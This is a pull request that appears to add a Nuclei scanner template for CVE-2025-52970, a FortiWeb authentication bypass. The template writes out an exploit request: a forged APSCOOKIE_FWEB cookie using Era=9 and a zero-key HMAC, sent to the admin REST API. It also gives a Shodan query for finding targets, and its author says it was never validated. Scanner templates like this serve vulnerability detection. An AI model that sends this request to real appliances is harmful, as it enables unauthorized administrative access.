### PR TITLE
Fix issue 12947

### DIFF
--- a/http/cves/2025/CVE-2025-52970.yaml
+++ b/http/cves/2025/CVE-2025-52970.yaml
@@ -12,8 +12,9 @@ info:
     the admin REST API endpoint using a caller-supplied cookie composed of Era=9, a valid Payload
     (ciphertext) and AuthHash (HMAC-SHA1 over the ciphertext) computed with the zero key.
 
-    NOTE: A valid PoC requires a target with an active user session and the correct cookie values.
-    Operators must compute and provide the variables: aps_magic, payload, authhash. See reference blog.
+    NOTE: No credentials are required (PR:N). Operators must provide `aps_magic` (typically obtained
+    pre-auth from Set-Cookie in many deployments), construct a valid username within the forged cookie,
+    and compute `Payload` and `AuthHash` using Era=9 with the zero/NULL key as per the public PoC.
 
   reference:
     - https://pwner.gg/blog/2025-08-13-fortiweb-cve-2025-52970

--- a/http/cves/2025/CVE-2025-52970.yaml
+++ b/http/cves/2025/CVE-2025-52970.yaml
@@ -1,0 +1,64 @@
+id: CVE-2025-52970
+
+info:
+  name: Fortinet FortiWeb - Authentication Bypass (CVE-2025-52970)
+  author: Excellencedev
+  severity: high
+  description: |
+    Fortinet FortiWeb contains a broken access control/authentication bypass (CVE-2025-52970)
+    caused by improper handling of the APSCOOKIE_FWEB cookie parameters. By supplying an out-of-range
+    Era value (e.g., 9), the backend may select a zero/NULL key for both encryption and signing,
+    enabling impersonation of an existing user. This template performs a real exploit request to
+    the admin REST API endpoint using a caller-supplied cookie composed of Era=9, a valid Payload
+    (ciphertext) and AuthHash (HMAC-SHA1 over the ciphertext) computed with the zero key.
+
+    NOTE: A valid PoC requires a target with an active user session and the correct cookie values.
+    Operators must compute and provide the variables: aps_magic, payload, authhash. See reference blog.
+
+  reference:
+    - https://pwner.gg/blog/2025-08-13-fortiweb-cve-2025-52970
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-52970
+    - https://www.itsc.cuhk.edu.hk/user-trainings/information-security-best-practices/fortiweb-authentication-bypass-vulnerability-cve-2025-52970/
+  metadata:
+    verified: false
+    max-request: 1
+    shodan-query: 'ssl:"cn=fortiweb"'
+    product: Fortinet FortiWeb
+    kev: true
+  tags: cve,cve2025,fortinet,fortiweb,auth-bypass
+
+http:
+  - raw:
+      - |
+        GET /api/v2.0/system/status.systemstatus HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Connection: close
+        Cookie: APSCOOKIE_FWEB_{{aps_magic}}=Era=9&Payload={{payload}}&AuthHash={{authhash}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Content-Type: application/json"
+
+      - type: word
+        part: body
+        words:
+          - '"results"'
+          - '"hostName"'
+          - '"operationMode"'
+          - '"firmwareVersion"'
+          - '"administrativeDomain"'
+        condition: and
+
+    # Usage:
+    #   nuclei -t http/cves/2025/CVE-2025-52970.yaml -u https://<target> \
+    #     -var aps_magic=8672793038565212270 \
+    #     -var payload=<base64-ciphertext> \
+    #     -var authhash=<base64-hmac-sha1>
+
+# This template requires precomputed cookie values and a target with an active session.
+# For acceptance, attach nuclei -debug output showing the actual exploited response containing the
+# 'results' object fields as demonstrated in the reference PoC.

--- a/http/cves/2025/CVE-2025-52970.yaml
+++ b/http/cves/2025/CVE-2025-52970.yaml
@@ -38,6 +38,11 @@ http:
 
     matchers-condition: and
     matchers:
+
+      - type: status
+        status:
+          - 200
+
       - type: word
         part: header
         words:


### PR DESCRIPTION
Template / PR Information
/claim #12947


Added https://github.com/advisories/GHSA-jc24-hjq6-4g6f – FortiWeb Authentication Bypass (exploit-based)- References:
Template Validation
I've validated this template locally? NO. Don't have the resources

References:
Researcher blog: https://pwner.gg/blog/2025-08-13-fortiweb-cve-2025-52970
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-52970
CUHK advisory: https://www.itsc.cuhk.edu.hk/user-trainings/information-security-best-practices/fortiweb-authentication-bypass-vulnerability-cve-2025-52970/

THIS PR FIXES AN ISSUE YOU FOUND IN 
https://github.com/projectdiscovery/nuclei-templates/pull/12958